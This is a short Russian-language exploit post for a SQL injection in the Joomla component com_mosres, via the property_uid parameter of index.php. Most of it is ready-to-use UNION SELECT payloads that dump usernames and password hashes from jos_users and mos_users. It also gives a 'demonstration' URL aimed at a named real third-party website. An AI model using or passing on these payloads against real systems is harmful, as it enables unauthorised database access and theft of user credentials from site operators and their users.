Программа: Joomla Component com_mosres

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «com_mosres» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL
code]

[SQL code]:

null’+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

Демонстрация:

http://ahtopolbg.com/index.php?option=com_mosres&catID=1004&regID=2&task=
viewproperty&property_uid=null’+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)
ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL
code]

[SQL code]:

null’+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*



Оставить мнение